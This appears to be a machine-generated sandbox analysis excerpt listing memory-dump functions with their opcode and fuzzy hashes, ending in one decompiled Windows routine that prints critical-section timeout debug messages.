                                                      • Instruction ID: bf59a9b96195044af281a77c1b299f6eaa5d4da1cd4623e3b8417ed6540dc734
                                                      • Opcode Fuzzy Hash: 71835e7e80957d2bcb2544d7cfadf81ff86af534839c43fcb773a595bd876a1e
                                                      • Instruction Fuzzy Hash: 1DF04971A0524CEFDB18EFA8D445AAEBBB4AF18300F044069E915EB281EB749900CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0113C577, Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2cad8d49361bfa85a70572f33750f3625252a1bff57267c13b7b7ef03e1fe39e
                                                      • Instruction ID: 96eda460cbb47ed021af44ecf906d6c2cd49f051b6cddb4061d62633b5aa1c2d
                                                      • Opcode Fuzzy Hash: 2cad8d49361bfa85a70572f33750f3625252a1bff57267c13b7b7ef03e1fe39e
                                                      • Instruction Fuzzy Hash: CAF024B2B156908FEB3EEB5CC004B217FD49B84330F458567D505A31CAC3A0C880CAC1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011D2073, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e4192eb0f77fc77e0f74c8f9c407c7d896b6111510aa4012acb03f6787b73511
                                                      • Instruction ID: 34f3fef5b54b7f33ebe0797f18befac0fb8b6c965607969e4e02c5d05134ac1d
                                                      • Opcode Fuzzy Hash: e4192eb0f77fc77e0f74c8f9c407c7d896b6111510aa4012acb03f6787b73511
                                                      • Instruction Fuzzy Hash: B7F0A02A8251954BDF3F6B2C71092EA2B96D765114B0A1589D8A01760AC7348993CB25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0115927A, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction ID: 74104270902362299efe589c7aeb07df24d249c8035cb86ec1c29330a09ba895
                                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                      • Instruction Fuzzy Hash: FEE02232340A41ABE7659E4ACC80F0337ADEFD2728F004078B9001F282CBE6DC0987A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E8D34, Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2771cbd5b805ae23f5dcb681e9f61ad60fd9bb95a986ab1fbde455d4e6864459
                                                      • Instruction ID: d7d57f97e3114d0ed9f1ae4be7afd07de1acff99ca3af86b5ad32ad28b0c0633
                                                      • Opcode Fuzzy Hash: 2771cbd5b805ae23f5dcb681e9f61ad60fd9bb95a986ab1fbde455d4e6864459
                                                      • Instruction Fuzzy Hash: 60F0B470A0460CDFDB18EFB8D445A6E77B4FF14304F108099E915EB291DB34D900CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E8B58, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49b12170c9bed6758ecc8adb20a44b3fda5778d5651fda8e2980ce07f8f1e3a6
                                                      • Instruction ID: b0ddaa0e62d4bd63908cb874977fb94c6811befe574030ef5d137f8fb27ad82f
                                                      • Opcode Fuzzy Hash: 49b12170c9bed6758ecc8adb20a44b3fda5778d5651fda8e2980ce07f8f1e3a6
                                                      • Instruction Fuzzy Hash: A8F05EB0A1465DEFDB18EBA8E90AA6EB7A4AB04204F040459AA159B281EB34D900C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0113746D, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ab6d582722bbef0eba47bb556cc7772d73d5a843e9c5a696667fc173880f84d
                                                      • Instruction ID: ad4b9bd524fb81f0f7a375b00c7d7e51ec41355ad4e2e0d55db5c9f00a27ff71
                                                      • Opcode Fuzzy Hash: 8ab6d582722bbef0eba47bb556cc7772d73d5a843e9c5a696667fc173880f84d
                                                      • Instruction Fuzzy Hash: 30F0E974514189EADF0E976CC440B7AFF71AF84214F050215D871A71D9F725F801C786
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011E8CD6, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 998209e82e82a83a15edc501149ec2f021955865a968b26ffc7408a27e7f7f78
                                                      • Instruction ID: ba0a14dd163d3883f8fd7e18a8ae80aef0d8285704da555f9e128e5528decea9
                                                      • Opcode Fuzzy Hash: 998209e82e82a83a15edc501149ec2f021955865a968b26ffc7408a27e7f7f78
                                                      • Instruction Fuzzy Hash: 86F05E70A0560DEFDB08DBE8E949E6E77B4AF58204F100199E915AB281EB34D9008755
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01114F2E, Relevance: .0, Instructions: 31COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81d4bf3d6886802895c476fc559a13c4a9c3b15ceafac2c65144d8413ab6f88c
                                                      • Instruction ID: c66b30b93ff66255f7189de10b68432e79e062e6f55cbc24a572244ba0467e61
                                                      • Opcode Fuzzy Hash: 81d4bf3d6886802895c476fc559a13c4a9c3b15ceafac2c65144d8413ab6f88c
                                                      • Instruction Fuzzy Hash: BBF0BE3A561785CFD76ADB5CC184B32B7E4AB0A778F054465E40587B62C724EA80C680
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0114A44B, Relevance: .0, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a2eeb8f8e8c2317b97ff31001c38b1d08bff78700702305a4c8edaa804ea0d5
                                                      • Instruction ID: 41032a63522ca4fb6e760a1b0f5570df326ce6d16d807613774f093fe39b7dcd
                                                      • Opcode Fuzzy Hash: 8a2eeb8f8e8c2317b97ff31001c38b1d08bff78700702305a4c8edaa804ea0d5
                                                      • Instruction Fuzzy Hash: 11E09272A41822ABD3265E18BC00F6A779DDFE4A55F0E4035EA05C7214D728DD02C7E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111F358, Relevance: .0, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction ID: 40c5cae241361e1ca30250ee9c16afbc50bbe7ae0d78cedb0fba9bea459e30b5
                                                      • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                      • Instruction Fuzzy Hash: 83E0D832A40119FBDB259ADD9D05F9ABFACDB54A60F000165BA04D7150D6609D01D2D0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112FF60, Relevance: .0, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 555d436fa092d876db794290118055e7b97b65dc29f5742fe77a8b3d717eab37
                                                      • Instruction ID: b9542874bf8c47912dcce2a648bd50725fe9a0c334479d9794f0d52b1edbfd1e
                                                      • Opcode Fuzzy Hash: 555d436fa092d876db794290118055e7b97b65dc29f5742fe77a8b3d717eab37
                                                      • Instruction Fuzzy Hash: 66E0DFB2209216DFD73DDB99D160F257BB8AF52625F1A801EE8084B502C722D8A2C287
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011A41E8, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15fd6335304564970c4e8afad9dde3ae1944b30feed7c55d52eec10a88466885
                                                      • Instruction ID: e744491f3ce933e60d27917f8a2a6e067b28254bc74a9fc22facc04fede0ef09
                                                      • Opcode Fuzzy Hash: 15fd6335304564970c4e8afad9dde3ae1944b30feed7c55d52eec10a88466885
                                                      • Instruction Fuzzy Hash: CDF0F27ED217018ECBABEBA9B5087093AB4F758215F40422A91008A6AFC77444A1CF05
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011CD380, Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction ID: 07b0b45e548a25f216a5b683ecc2f4a8a34bd06eafe2f693e7d6d493cdfa4e44
                                                      • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                      • Instruction Fuzzy Hash: 5EE0C271285649BBDF2B5E84DC00F69BB16DB60BA4F104035FE085AA90C7719C91D6C4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0114A185, Relevance: .0, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09e38ed588c673a58d3186829ab7748c6d1d6349705feaf9ced58992321d0df4
                                                      • Instruction ID: 6cb96ea1a3431e6552671a838386934c1b6420e8d4bf65b18b54b23768ff7f58
                                                      • Opcode Fuzzy Hash: 09e38ed588c673a58d3186829ab7748c6d1d6349705feaf9ced58992321d0df4
                                                      • Instruction Fuzzy Hash: 10D05B611B10045BE72F5750A978B253656FBC9F54F35460DF2074F9E6EB5088F4D108
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011416E0, Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4084df9bc1eb6f11eb774e8507311ce2e9f811dc5dc510fe44132bb50fe1b70f
                                                      • Instruction ID: 9101e02abaeff305bc17d18d6831f94a44a0d18068eb34e521f9e6eecccded36
                                                      • Opcode Fuzzy Hash: 4084df9bc1eb6f11eb774e8507311ce2e9f811dc5dc510fe44132bb50fe1b70f
                                                      • Instruction Fuzzy Hash: DCD0A971200601B3EA2E9B189824B142652EBD0F8AF38006CF20B498D1CFE0ECE2E448
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011953CA, Relevance: .0, Instructions: 16COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction ID: 05e4aaaf0fe32d01f3d9801d7009079987331d73b521e99807f3fe6694e7e195
                                                      • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                      • Instruction Fuzzy Hash: E2E08C729446849BDF1BDB48C650F4EBBF6FB84B00F180004A4086B660C724AD00CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0112AAB0, Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction ID: 7335774ae2240cbd6b1b27e7125c2ef4cc44bc7fef6b4a2201eb9dd3b7c88712
                                                      • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                      • Instruction Fuzzy Hash: 28D0E935352990CFD61BCB1DD554B1577B5BF44B44FC90490E501CBB62E72DD954CA00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011435A1, Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction ID: bed12483db4af612923e01ad350a8235f8c0048ad69bb7a4016253ea281897dc
                                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                      • Instruction Fuzzy Hash: 2CD0A9324621A19BEB0EBB14C2187683BB2BB00A08F582065C0220E856C33A4A1ACE81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111DB40, Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction ID: 0191439a2d2333e1a1a16d506858c7f99420d5248581e76dd57dc1250e594599
                                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                      • Instruction Fuzzy Hash: 1AC08C70280A01AAEB2A1F24CD01B007AA0BB51B05F8400A06301DA4F4DB78D802E600
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0119A537, Relevance: .0, Instructions: 11COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction ID: e2e20494445cb294f594e455d26ae5780481412e8e88a9f0befd89389fb85863
                                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                      • Instruction Fuzzy Hash: FDC08C33080248BBCB126F82CC00F467F2AFBA4B60F008020FA080B570C632E970EB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01133A1C, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction ID: 1df228fe4cfb62fdbf550d19c8343ec7db8a9c5d6841f83017fa0640a1b7e4b5
                                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction Fuzzy Hash: FDC04C72180648BBC7166E45DD01F157B69E7A4B60F154021B6040A9618676ED61E598
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0111AD30, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction ID: 7887e105dd4fffd0e9fbbfefadaeb7740873511309c6335628da26526b185e34
                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction Fuzzy Hash: C1C08C32080648BBC7126A45CD00F017B29E7A0B60F000020F6040A6A18A32E860D588
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011436CC, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction ID: 0cbeabdb27d17995c9718dc4bb53b063866172e0b824f7c8ce5286f714e0f92b
                                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction Fuzzy Hash: B9C02BB0160840FBE71D1F30CD01F147254F740E31F6403547230458F0D7289C00E100
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011276E2, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction ID: 9e2c71cb81f2c7c0615350a94d5aa23770d9ab4bbcd570fb7fbc2968aec1ba0d
                                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction Fuzzy Hash: 9CC08CB01415845BFB3F570DCE24B223A50AB28608F88019CEA02094E2C368A822C208
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01137D50, Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction ID: 8e4b8ff50291d66e02176f90ff9d2771cb26060ea78916056ef7d6187c00dcd2
                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction Fuzzy Hash: 12B09235301940CFCE1ADF18C084B1933E4BB84A40B8400D0E400CBA21D329E8008900
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01142ACB, Relevance: .0, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction ID: 6f1860c5d7e1973f6d41e527a6e6ab6d00de625216a38205d4cc904056673738
                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction Fuzzy Hash: AEB01233C51451CFCF0AEF40C610B197331FB00750F094490D00127930C328AC11CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 011AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E011AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0115CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E011A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E011A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                      0x011afdda
                                                      0x011afde2
                                                      0x011afde5
                                                      0x011afdec
                                                      0x011afdfa
                                                      0x011afdff
                                                      0x011afe0a
                                                      0x011afe0f
                                                      0x011afe17
                                                      0x011afe1e
                                                      0x011afe19
                                                      0x011afe19
                                                      0x011afe19
                                                      0x011afe20
                                                      0x011afe21
                                                      0x011afe22
                                                      0x011afe25
                                                      0x011afe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011AFDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011AFE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011AFE01
                                                      Memory Dump Source
                                                      • Source File: 00000015.00000002.438607957.00000000010F0000.00000040.00000001.sdmp, Offset: 010F0000, based on PE: true
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: 861d98381e9f9502c842101d5d7f402e16dff478ccc56c9639113ed321f2d301
                                                      • Instruction ID: a4ce90e5dbea2a42fa48ca2a90b0cb249c406992913f8c06d4d60d8e80560b1f
                                                      • Opcode Fuzzy Hash: 861d98381e9f9502c842101d5d7f402e16dff478ccc56c9639113ed321f2d301
                                                      • Instruction Fuzzy Hash: 95F0F636604602BFEA291A85DC06F37BF5AEB44B70F650315F728561D1EBB2F82096F4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%